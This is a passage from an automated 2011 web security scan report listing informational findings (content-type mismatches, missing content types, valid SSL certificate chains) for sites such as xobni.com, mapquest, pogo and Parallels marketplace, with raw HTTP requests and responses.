29.61. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/fonts/Chunkfive-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /media/fonts/Chunkfive-webfont.woff HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:40 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Thu, 10 Feb 2011 05:19:01 GMT
ETag: "2a5da-2f68-49be6b8241b40"
Accept-Ranges: bytes
Content-Length: 12136
Age: 11559
Content-Type: text/plain
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:40 GMT;path=/;domain=xobni.com;httponly

wOFF....../h......G.........................FFTM...l........Zo..GDEF........... ....OS/2.......J...`.3..cmap............S..cvt .......&...&.T..fpgm...,.......e../.gasp................glyf......%...:.
...[SNIP]...
30. Content type is not specified  previous  next
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

30.1. http://listings.mapquest.com/apps/images/favicon_mq.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://listings.mapquest.com
Path:   /apps/images/favicon_mq.ico

Request

GET /apps/images/favicon_mq.ico HTTP/1.1
Host: listings.mapquest.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=apps1~62851C09A172E80EE111FF19DB732EFC; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_pers=%20s_getnr%3D1308924961965-New%7C1371996961965%3B%20s_nrgvo%3DNew%7C1371996961966%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
ETag: W/"1150-1308876447000"
Last-Modified: Fri, 24 Jun 2011 00:47:27 GMT
Content-Length: 1150
Date: Fri, 24 Jun 2011 14:16:01 GMT

............ .h.......(....... ..... .............................?...?...?...?...?...?...?...?...?...?...?...?...?...?.......?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.
...[SNIP]...
30.2. http://www.pogo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297; s_pers=%20s_nr%3D1308921994778-New%7C1311513994778%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 5199
Date: Fri, 24 Jun 2011 12:15:40 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
31. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

31.1. https://shop.marketplace.parallels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.marketplace.parallels.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  shop.marketplace.parallels.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Jul 29 10:39:53 CDT 2009
Valid to:  Fri Jul 29 10:39:53 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
31.2. https://softlayer.parallelsmarketplace.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  softlayer.parallelsmarketplace.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun Nov 28 21:25:19 CST 2010
Valid to:  Sun Jan 01 05:49:05 CST 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
Report generated by XSS.CX at Sat Jun 25 09:46:18 CDT 2011.